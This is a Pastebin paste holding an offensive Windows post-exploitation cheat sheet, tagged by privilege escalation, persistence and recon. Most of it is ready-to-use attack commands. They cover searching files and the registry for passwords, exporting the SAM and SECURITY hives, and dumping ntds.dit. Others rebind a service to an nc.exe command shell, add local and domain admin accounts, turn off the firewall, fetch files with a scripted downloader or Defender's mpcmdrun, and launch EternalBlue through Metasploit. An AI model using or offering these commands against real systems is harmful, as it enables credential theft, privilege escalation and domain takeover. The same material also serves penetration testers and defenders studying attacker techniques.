API tools faq
paste
Advertisement
Sweetening

command prompt

Sweetening
Nov 27th, 2023
61
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.67 KB | None | 0 0
raw download clone embed print report
  1. # windows
  2.  
  3. #plateform/windows #target/local #cat/PRIVESC
  4.  
  5. ## get info system
  6. ```
  7. systeminfo
  8. ```
  9.  
  10. ## get info system limited
  11. ```
  12. systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
  13. ```
  14.  
  15. ## find passwords
  16. ```
  17. findstr /si 'password' *.txt *.xml *.docx
  18. ```
  19.  
  20. ## find passwords - group policy preference (ms14-025)
  21. ```
  22. findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
  23. ```
  24.  
  25. ## get patches
  26. ```
  27. wmic qfe get Caption,Description,HotFixID,InstalledOn
  28. ```
  29.  
  30. ## get hostname
  31. ```
  32. hostname
  33. ```
  34.  
  35. ## get computer name
  36. ```powershell
  37. $env:computername
  38. ```
  39.  
  40. ## show environment - List all environment variables
  41. ```
  42. set
  43. ```
  44.  
  45. ## dns request for DC
  46. ```
  47. nslookup -type=any <userdnsdomain>.
  48. ```
  49.  
  50. ## show mounted disks
  51. ```
  52. wmic logicaldisk get caption,description,providername
  53. ```
  54.  
  55. ## show recycle bin
  56. ```
  57. dir C:\$Recycle.Bin /s /b
  58. ```
  59.  
  60. ## get architecture
  61. ```
  62. wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%
  63. ```
  64.  
  65. ## list scheduled tasks
  66. ```
  67. schtasks /query /fo LIST /v
  68. ```
  69.  
  70. ## list one scheduled task
  71. ```
  72. schtasks /query /fo LIST 2>nul | findstr <taskname>
  73. ```
  74.  
  75. ## list process
  76. ```
  77. tasklist /V
  78. ```
  79.  
  80. ## list process and links to started services
  81. ```
  82. tasklist /SVC
  83. ```
  84.  
  85. ## list windows service started (1)
  86. ```
  87. net start
  88. ```
  89.  
  90. ## list services (2)
  91. ```
  92. wmic service list brief
  93. ```
  94.  
  95. ## list services (3)
  96. ```
  97. sc query #List of services
  98. ```
  99.  
  100. ## list installed software (1)
  101. ```
  102. dir /a "C:\Program Files"
  103. ```
  104.  
  105. ## list installed software (2)
  106. ```
  107. dir /a "C:\Program Files (x86)"
  108. ```
  109.  
  110. ## list installed software (3)
  111. ```
  112. reg query HKEY_LOCAL_MACHINE\SOFTWARE
  113. ```
  114.  
  115. ## show lsa cached credentials value
  116. ```
  117. reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
  118. ```
  119.  
  120. ## register query word password (1)
  121. ```
  122. reg query HKLM /f password /t REG_SZ /s
  123. ```
  124.  
  125. ## register query word password (2)
  126. ```
  127. reg query HKCU /f password /t REG_SZ /s
  128. ```
  129.  
  130. ## register query extract SAM
  131.  
  132. When the Windows operating system is running, the hives are in use and mounted. The command-line tool named reg can be used to export them.
  133.  
  134. ```
  135. reg save HKLM\SAM 'C:\Windows\Temp\sam.save'
  136. reg save HKLM\SECURITY 'C:\Windows\Temp\security.save'
  137. reg save HKLM\SYSTEM 'C:\Windows\Temp\system.save'
  138. ```
  139.  
  140. ## create shadow copy
  141. ```
  142. wmic shadowcopy call create Volume='C:\'
  143. ```
  144.  
  145. ## list shadow copy
  146. ```
  147. vssadmin list shadows
  148. ```
  149.  
  150. ## check service privilege
  151. ```
  152. accesschk.exe /accepteula -ucqv <service_name>
  153. ```
  154.  
  155. ## reconfigure service
  156. ```
  157. sc config <service> binpath= "C:\nc.exe -nv 127.0.0.1 4444 -e C:\WINDOWS\System32\cmd.exe"
  158. ```
  159.  
  160. ## change service
  161. ```
  162. sc config <service> obj= ".\LocalSystem" password= ""
  163. ```
  164.  
  165. ## start service
  166. ```
  167. net start <service>
  168. ```
  169.  
  170. ## check permission (1)
  171. ```
  172. accesschk.exe /accepteula -dqv "<file>"
  173. ```
  174.  
  175. ## check permission (2)
  176. ```
  177. cacls "<file>"
  178. ```
  179.  
  180. ## find weak folder permission
  181. ```
  182. accesschk.exe -uwdqs Users <c>:\
  183. ```
  184.  
  185. ## find weak file permission
  186. ```
  187. accesschk.exe -uwqs Users <c>:\
  188. ```
  189.  
  190. % windows, download
  191.  
  192. ## VBS download file script
  193. #cat/ATTACK/FILE_TRANSFERT
  194. ```
  195. echo var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);WinHttpReq.Send();WScript.Echo(WinHttpReq.ResponseText); > fu.js && cscript /nologo fu.js <file_url> > <downloaded_file>
  196. ```
  197.  
  198. % windows, users
  199.  
  200. ## add user
  201. #cat/PERSIST
  202. ```
  203. net user <username> <password> /ADD
  204. ```
  205.  
  206. ## add user to domain
  207. #cat/PERSIST
  208. ```
  209. net user <username> <password> /ADD /DOMAIN
  210. ```
  211.  
  212. ## add user as admin
  213. #cat/PERSIST
  214. ```
  215. net localgroup administrators <username> /add
  216. ```
  217.  
  218. ## run as over user
  219. #cat/PRIVESC
  220. ```
  221. runas /user:<domain>\<user> cmd.exe
  222. ```
  223.  
  224. ## whoami - All info about me, take a look at the enabled tokens
  225. #cat/PRIVESC
  226. ```
  227. whoami /all
  228. ```
  229.  
  230. ## whoami privilegied
  231. #cat/PRIVESC
  232. ```
  233. whoami /priv #Show only privileges
  234. ```
  235.  
  236. ## list all users
  237. #cat/PRIVESC
  238. ```
  239. net users
  240. ```
  241.  
  242. ## list domain admins (fr)
  243. #plateform/windows #target/local #cat/RECON
  244. ```
  245. net group "Admins du domaine"
  246. ```
  247.  
  248. ## infos about a user
  249. #cat/RECON
  250. ```
  251. net user <username>
  252. ```
  253.  
  254. ## infos on a Administrator and retrieve SID
  255. ```powershell
  256. [wmi] "Win32_userAccount.Domain='<computer_name>',Name='Administrator'"
  257. ```
  258.  
  259. ## infos about password policy
  260. #cat/RECON
  261. ```
  262. net accounts
  263. ```
  264.  
  265. ## who logged in
  266. #cat/PRIVESC
  267. ```
  268. qwinsta
  269. ```
  270.  
  271. ## List credentials
  272. #cat/POSTEXPLOIT/CREDS_RECOVER
  273. ```
  274. cmdkey /list
  275. ```
  276.  
  277. ## show local groups
  278. #cat/RECON
  279. ```
  280. net localgroup
  281. ```
  282.  
  283. ## show specific local group
  284. ```
  285. net localgroup <group_name>
  286. ```
  287.  
  288. ## show domain groups
  289. ```
  290. net group /domain
  291. ```
  292.  
  293. ## show domain group users
  294. ```
  295. net group /domain <domain_group_name>
  296. ```
  297.  
  298. % windows, domain infos
  299.  
  300. ## get domain name
  301. ```
  302. echo %USERDOMAIN%
  303. ```
  304.  
  305. ## get domain name (2)
  306. ```
  307. echo %USERDNSDOMAIN%
  308. ```
  309.  
  310. ## get computer domain name (3)
  311. ```
  312. systeminfo | findstr /B /C:"Domain"
  313. ```
  314.  
  315. ## get name of the DC
  316. ```
  317. echo %logonserver%
  318. ```
  319.  
  320. ## get name of the dc (2)
  321. ```
  322. set logonserver #Get name of the domain controller
  323. ```
  324.  
  325. ## list of domain groups
  326. ```
  327. net groups /domain
  328. ```
  329.  
  330. ## list of computer connected to the domain
  331. ```
  332. net group "domain computers" /domain
  333. ```
  334.  
  335. ## List all PCs of the domain
  336. ```
  337. net view /domain
  338. ```
  339.  
  340. ## list domain controllers
  341. ```
  342. nltest /dclist:<domain>
  343. ```
  344.  
  345. ## list pc accounts of domain controllers
  346. ```
  347. net group "Domain Controllers" /domain
  348. ```
  349.  
  350. ## List users with domain admin privileges
  351. ```
  352. net group "Domain Admins" /domain
  353. ```
  354.  
  355. ## Add user to domain admin group
  356. ```
  357. net group "Domain Admins" <username> /add /domain
  358. ```
  359.  
  360. ## Add user to domain admin group - FR
  361. ```
  362. net group "Admins du domaine" <username> /add /domain
  363. ```
  364.  
  365. ## List users that belongs to the administrators group inside the domain
  366. ```
  367. net localgroup administrators /domain
  368. ```
  369.  
  370. ## List all domain users
  371. ```
  372. net user /domain
  373. ```
  374.  
  375. ## get user domain information
  376. ```
  377. net user <username> /domain
  378. ```
  379.  
  380. ## domain password and lockout policy
  381. ```
  382. net accounts /domain
  383. ```
  384.  
  385. ## get mapping of the trust relationships
  386. ```
  387. nltest /domain_trust
  388. ```
  389.  
  390. % windows, network
  391. ## all interfaces
  392. ```
  393. ipconfig /all
  394. ```
  395.  
  396. ## print all routes
  397. ```
  398. route print
  399. ```
  400.  
  401. ## list of know hosts
  402. ```
  403. arp -a
  404. ```
  405.  
  406. ## list open ports
  407. ```
  408. netstat -ano
  409. ```
  410.  
  411. ## show hosts file
  412. ```
  413. type C:\WINDOWS\System32\drivers\etc\hosts
  414. ```
  415.  
  416. % windows, dir
  417.  
  418. ## list hidden files
  419. ```
  420. dir /a:h <path>
  421. ```
  422.  
  423. ## Recursive list
  424. ```
  425. dir /s /b
  426. ```
  427.  
  428. % windows, firewall
  429. ## show firewall state
  430. ```
  431. netsh firewall show state
  432. ```
  433.  
  434. ## show firewall config
  435. ```
  436. netsh firewall show config
  437. ```
  438.  
  439. ## turn off firewall
  440. ```
  441. NetSh Advfirewall set allprofiles state off
  442. ```
  443.  
  444. ## turn off firewall (2)
  445. ```
  446. netsh firewall set opmode disable
  447. ```
  448.  
  449. ## turn on firewall
  450. ```
  451. NetSh Advfirewall set allprofiles state on
  452. ```
  453.  
  454. ## firewall open port RDP
  455. ```
  456. netsh firewall add portopening TCP 3389 "Remote Desktop"
  457. ```
  458.  
  459. % windows, ntds.dit
  460. ## dump ntds.dit (Windows >= 2008 server) - method 1
  461. ```
  462. ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
  463. ```
  464. ## dump ntds.dit (Windows >= 2008 server) - method 2
  465. ```
  466. esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit
  467. ```
  468. ## dump ntds.dit (Windows <= 2003 server)
  469. ```
  470. net start vss && vssadmin create shadow /for=c: && vssadmin list shadows && copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit C:\temp
  471. ```
  472.  
  473. % windows, smb, share
  474. ## list of computer
  475. ```
  476. net view
  477. ```
  478.  
  479. ## list of computer shares on the domain
  480. ```
  481. net view /all /domain <domain_name>
  482. ```
  483.  
  484. ## list share of a computer
  485. ```
  486. net view \\<ip> \ALL
  487. ```
  488.  
  489. ## mount share locally
  490. ```
  491. net use x: \\<ip>\<share_name>
  492. ```
  493.  
  494. ## check current share
  495. ```
  496. net share
  497. ```
  498.  
  499. % windows, file, download
  500. ## windows download file with windows defender
  501. ```
  502. "c:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\mpcmdrun.exe" -DownloadFile -url <url> -path <result_file>
  503. ```
  504.  
  505. ## windows download file with windows defender
  506. ```
  507. mpcmdrun.exe -DownloadFile -url <url> -path <result_file>
  508. ```
  509.  
  510. % windows, active directory, dns
  511.  
  512. ## find AD IP - show domain name and dns
  513. ```
  514. nmcli dev show <interface>
  515. ```
  516.  
  517. ## nslookup AD - domain
  518. ```
  519. nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain_name>
  520. ```
  521.  
  522. % windows, active directory
  523.  
  524. ## enable sid history
  525. Enable history on source domain for target domain (useful for forest extra SID exploitation)
  526. ```
  527. netdom trust <source_domain> /d:<target_domain> /enablesidhistory:yes
  528. ```
  529.  
  530. % windows, cve
  531. ## windows eternal blue - smb - ms17-010
  532. ```
  533. msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue"
  534. ```
  535.  
  536. = interface: eth0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!